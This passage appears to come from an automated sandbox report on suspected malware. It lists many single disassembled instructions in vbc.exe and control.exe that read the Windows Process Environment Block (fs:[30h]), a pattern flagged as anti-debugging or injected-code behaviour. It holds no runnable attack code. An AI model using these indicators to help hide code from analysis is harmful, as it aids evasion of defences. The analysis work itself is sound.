Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054453CA mov eax, dword ptr fs:[00000030h]	5_2_054453CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054453CA mov eax, dword ptr fs:[00000030h]	5_2_054453CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F4BAD mov eax, dword ptr fs:[00000030h]	5_2_053F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F4BAD mov eax, dword ptr fs:[00000030h]	5_2_053F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F4BAD mov eax, dword ptr fs:[00000030h]	5_2_053F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F2397 mov eax, dword ptr fs:[00000030h]	5_2_053F2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FB390 mov eax, dword ptr fs:[00000030h]	5_2_053FB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D1B8F mov eax, dword ptr fs:[00000030h]	5_2_053D1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D1B8F mov eax, dword ptr fs:[00000030h]	5_2_053D1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548138A mov eax, dword ptr fs:[00000030h]	5_2_0548138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0547D380 mov ecx, dword ptr fs:[00000030h]	5_2_0547D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EDBE9 mov eax, dword ptr fs:[00000030h]	5_2_053EDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]	5_2_053F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]	5_2_053F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]	5_2_053F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]	5_2_053F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]	5_2_053F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]	5_2_053F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05495BA5 mov eax, dword ptr fs:[00000030h]	5_2_05495BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05454257 mov eax, dword ptr fs:[00000030h]	5_2_05454257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548EA55 mov eax, dword ptr fs:[00000030h]	5_2_0548EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E3A1C mov eax, dword ptr fs:[00000030h]	5_2_053E3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0547B260 mov eax, dword ptr fs:[00000030h]	5_2_0547B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0547B260 mov eax, dword ptr fs:[00000030h]	5_2_0547B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CAA16 mov eax, dword ptr fs:[00000030h]	5_2_053CAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CAA16 mov eax, dword ptr fs:[00000030h]	5_2_053CAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05498A62 mov eax, dword ptr fs:[00000030h]	5_2_05498A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C5210 mov eax, dword ptr fs:[00000030h]	5_2_053C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C5210 mov ecx, dword ptr fs:[00000030h]	5_2_053C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C5210 mov eax, dword ptr fs:[00000030h]	5_2_053C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C5210 mov eax, dword ptr fs:[00000030h]	5_2_053C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D8A0A mov eax, dword ptr fs:[00000030h]	5_2_053D8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0540927A mov eax, dword ptr fs:[00000030h]	5_2_0540927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548AA16 mov eax, dword ptr fs:[00000030h]	5_2_0548AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548AA16 mov eax, dword ptr fs:[00000030h]	5_2_0548AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05404A2C mov eax, dword ptr fs:[00000030h]	5_2_05404A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05404A2C mov eax, dword ptr fs:[00000030h]	5_2_05404A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C9240 mov eax, dword ptr fs:[00000030h]	5_2_053C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C9240 mov eax, dword ptr fs:[00000030h]	5_2_053C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C9240 mov eax, dword ptr fs:[00000030h]	5_2_053C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C9240 mov eax, dword ptr fs:[00000030h]	5_2_053C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DAAB0 mov eax, dword ptr fs:[00000030h]	5_2_053DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DAAB0 mov eax, dword ptr fs:[00000030h]	5_2_053DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FFAB0 mov eax, dword ptr fs:[00000030h]	5_2_053FFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C52A5 mov eax, dword ptr fs:[00000030h]	5_2_053C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C52A5 mov eax, dword ptr fs:[00000030h]	5_2_053C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C52A5 mov eax, dword ptr fs:[00000030h]	5_2_053C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C52A5 mov eax, dword ptr fs:[00000030h]	5_2_053C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C52A5 mov eax, dword ptr fs:[00000030h]	5_2_053C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FD294 mov eax, dword ptr fs:[00000030h]	5_2_053FD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FD294 mov eax, dword ptr fs:[00000030h]	5_2_053FD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F2AE4 mov eax, dword ptr fs:[00000030h]	5_2_053F2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F2ACB mov eax, dword ptr fs:[00000030h]	5_2_053F2ACB
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED14FB mov eax, dword ptr fs:[00000030h]	8_2_04ED14FB
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96CF0 mov eax, dword ptr fs:[00000030h]	8_2_04E96CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96CF0 mov eax, dword ptr fs:[00000030h]	8_2_04E96CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96CF0 mov eax, dword ptr fs:[00000030h]	8_2_04E96CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE8CD6 mov eax, dword ptr fs:[00000030h]	8_2_04EE8CD6
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2849B mov eax, dword ptr fs:[00000030h]	8_2_04E2849B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3746D mov eax, dword ptr fs:[00000030h]	8_2_04E3746D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4A44B mov eax, dword ptr fs:[00000030h]	8_2_04E4A44B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EAC450 mov eax, dword ptr fs:[00000030h]	8_2_04EAC450
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EAC450 mov eax, dword ptr fs:[00000030h]	8_2_04EAC450
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4BC2C mov eax, dword ptr fs:[00000030h]	8_2_04E4BC2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE740D mov eax, dword ptr fs:[00000030h]	8_2_04EE740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE740D mov eax, dword ptr fs:[00000030h]	8_2_04EE740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE740D mov eax, dword ptr fs:[00000030h]	8_2_04EE740D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96C0A mov eax, dword ptr fs:[00000030h]	8_2_04E96C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96C0A mov eax, dword ptr fs:[00000030h]	8_2_04E96C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96C0A mov eax, dword ptr fs:[00000030h]	8_2_04E96C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96C0A mov eax, dword ptr fs:[00000030h]	8_2_04E96C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]	8_2_04ED1C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2D5E0 mov eax, dword ptr fs:[00000030h]	8_2_04E2D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2D5E0 mov eax, dword ptr fs:[00000030h]	8_2_04E2D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EDFDE2 mov eax, dword ptr fs:[00000030h]	8_2_04EDFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EDFDE2 mov eax, dword ptr fs:[00000030h]	8_2_04EDFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EDFDE2 mov eax, dword ptr fs:[00000030h]	8_2_04EDFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EDFDE2 mov eax, dword ptr fs:[00000030h]	8_2_04EDFDE2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EC8DF1 mov eax, dword ptr fs:[00000030h]	8_2_04EC8DF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96DC9 mov eax, dword ptr fs:[00000030h]	8_2_04E96DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96DC9 mov eax, dword ptr fs:[00000030h]	8_2_04E96DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96DC9 mov eax, dword ptr fs:[00000030h]	8_2_04E96DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96DC9 mov ecx, dword ptr fs:[00000030h]	8_2_04E96DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96DC9 mov eax, dword ptr fs:[00000030h]	8_2_04E96DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E96DC9 mov eax, dword ptr fs:[00000030h]	8_2_04E96DC9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE05AC mov eax, dword ptr fs:[00000030h]	8_2_04EE05AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE05AC mov eax, dword ptr fs:[00000030h]	8_2_04EE05AC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E435A1 mov eax, dword ptr fs:[00000030h]	8_2_04E435A1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E41DB5 mov eax, dword ptr fs:[00000030h]	8_2_04E41DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E41DB5 mov eax, dword ptr fs:[00000030h]	8_2_04E41DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E41DB5 mov eax, dword ptr fs:[00000030h]	8_2_04E41DB5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E42581 mov eax, dword ptr fs:[00000030h]	8_2_04E42581
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E42581 mov eax, dword ptr fs:[00000030h]	8_2_04E42581
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E42581 mov eax, dword ptr fs:[00000030h]	8_2_04E42581
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E42581 mov eax, dword ptr fs:[00000030h]	8_2_04E42581
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E12D8A mov eax, dword ptr fs:[00000030h]	8_2_04E12D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E12D8A mov eax, dword ptr fs:[00000030h]	8_2_04E12D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E12D8A mov eax, dword ptr fs:[00000030h]	8_2_04E12D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E12D8A mov eax, dword ptr fs:[00000030h]	8_2_04E12D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E12D8A mov eax, dword ptr fs:[00000030h]	8_2_04E12D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4FD9B mov eax, dword ptr fs:[00000030h]	8_2_04E4FD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4FD9B mov eax, dword ptr fs:[00000030h]	8_2_04E4FD9B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3C577 mov eax, dword ptr fs:[00000030h]	8_2_04E3C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3C577 mov eax, dword ptr fs:[00000030h]	8_2_04E3C577
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E53D43 mov eax, dword ptr fs:[00000030h]	8_2_04E53D43
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E93540 mov eax, dword ptr fs:[00000030h]	8_2_04E93540
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EC3D40 mov eax, dword ptr fs:[00000030h]	8_2_04EC3D40
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E37D50 mov eax, dword ptr fs:[00000030h]	8_2_04E37D50
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1AD30 mov eax, dword ptr fs:[00000030h]	8_2_04E1AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EDE539 mov eax, dword ptr fs:[00000030h]	8_2_04EDE539
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]	8_2_04E23D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE8D34 mov eax, dword ptr fs:[00000030h]	8_2_04EE8D34
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E9A537 mov eax, dword ptr fs:[00000030h]	8_2_04E9A537
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E44D3B mov eax, dword ptr fs:[00000030h]	8_2_04E44D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E44D3B mov eax, dword ptr fs:[00000030h]	8_2_04E44D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E44D3B mov eax, dword ptr fs:[00000030h]	8_2_04E44D3B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E276E2 mov eax, dword ptr fs:[00000030h]	8_2_04E276E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E416E0 mov ecx, dword ptr fs:[00000030h]	8_2_04E416E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E58EC7 mov eax, dword ptr fs:[00000030h]	8_2_04E58EC7
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E436CC mov eax, dword ptr fs:[00000030h]	8_2_04E436CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ECFEC0 mov eax, dword ptr fs:[00000030h]	8_2_04ECFEC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE8ED6 mov eax, dword ptr fs:[00000030h]	8_2_04EE8ED6
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE0EA5 mov eax, dword ptr fs:[00000030h]	8_2_04EE0EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE0EA5 mov eax, dword ptr fs:[00000030h]	8_2_04EE0EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE0EA5 mov eax, dword ptr fs:[00000030h]	8_2_04EE0EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E946A7 mov eax, dword ptr fs:[00000030h]	8_2_04E946A7
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EAFE87 mov eax, dword ptr fs:[00000030h]	8_2_04EAFE87
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2766D mov eax, dword ptr fs:[00000030h]	8_2_04E2766D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3AE73 mov eax, dword ptr fs:[00000030h]	8_2_04E3AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3AE73 mov eax, dword ptr fs:[00000030h]	8_2_04E3AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3AE73 mov eax, dword ptr fs:[00000030h]	8_2_04E3AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3AE73 mov eax, dword ptr fs:[00000030h]	8_2_04E3AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3AE73 mov eax, dword ptr fs:[00000030h]	8_2_04E3AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]	8_2_04E27E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]	8_2_04E27E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]	8_2_04E27E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]	8_2_04E27E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]	8_2_04E27E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h]	8_2_04E27E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EDAE44 mov eax, dword ptr fs:[00000030h]	8_2_04EDAE44
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EDAE44 mov eax, dword ptr fs:[00000030h]	8_2_04EDAE44
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1E620 mov eax, dword ptr fs:[00000030h]	8_2_04E1E620
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ECFE3F mov eax, dword ptr fs:[00000030h]	8_2_04ECFE3F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1C600 mov eax, dword ptr fs:[00000030h]	8_2_04E1C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1C600 mov eax, dword ptr fs:[00000030h]	8_2_04E1C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1C600 mov eax, dword ptr fs:[00000030h]	8_2_04E1C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E48E00 mov eax, dword ptr fs:[00000030h]	8_2_04E48E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED1608 mov eax, dword ptr fs:[00000030h]	8_2_04ED1608
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4A61C mov eax, dword ptr fs:[00000030h]	8_2_04E4A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4A61C mov eax, dword ptr fs:[00000030h]	8_2_04E4A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E537F5 mov eax, dword ptr fs:[00000030h]	8_2_04E537F5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E28794 mov eax, dword ptr fs:[00000030h]	8_2_04E28794
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E97794 mov eax, dword ptr fs:[00000030h]	8_2_04E97794
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E97794 mov eax, dword ptr fs:[00000030h]	8_2_04E97794
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E97794 mov eax, dword ptr fs:[00000030h]	8_2_04E97794
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2FF60 mov eax, dword ptr fs:[00000030h]	8_2_04E2FF60
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE8F6A mov eax, dword ptr fs:[00000030h]	8_2_04EE8F6A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2EF40 mov eax, dword ptr fs:[00000030h]	8_2_04E2EF40
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E14F2E mov eax, dword ptr fs:[00000030h]	8_2_04E14F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E14F2E mov eax, dword ptr fs:[00000030h]	8_2_04E14F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4E730 mov eax, dword ptr fs:[00000030h]	8_2_04E4E730
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE070D mov eax, dword ptr fs:[00000030h]	8_2_04EE070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE070D mov eax, dword ptr fs:[00000030h]	8_2_04EE070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4A70E mov eax, dword ptr fs:[00000030h]	8_2_04E4A70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4A70E mov eax, dword ptr fs:[00000030h]	8_2_04E4A70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3F716 mov eax, dword ptr fs:[00000030h]	8_2_04E3F716
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EAFF10 mov eax, dword ptr fs:[00000030h]	8_2_04EAFF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EAFF10 mov eax, dword ptr fs:[00000030h]	8_2_04EAFF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E140E1 mov eax, dword ptr fs:[00000030h]	8_2_04E140E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E140E1 mov eax, dword ptr fs:[00000030h]	8_2_04E140E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E140E1 mov eax, dword ptr fs:[00000030h]	8_2_04E140E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E158EC mov eax, dword ptr fs:[00000030h]	8_2_04E158EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EAB8D0 mov eax, dword ptr fs:[00000030h]	8_2_04EAB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EAB8D0 mov ecx, dword ptr fs:[00000030h]	8_2_04EAB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EAB8D0 mov eax, dword ptr fs:[00000030h]	8_2_04EAB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EAB8D0 mov eax, dword ptr fs:[00000030h]	8_2_04EAB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EAB8D0 mov eax, dword ptr fs:[00000030h]	8_2_04EAB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EAB8D0 mov eax, dword ptr fs:[00000030h]	8_2_04EAB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]	8_2_04E420A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]	8_2_04E420A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]	8_2_04E420A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]	8_2_04E420A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]	8_2_04E420A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h]	8_2_04E420A0
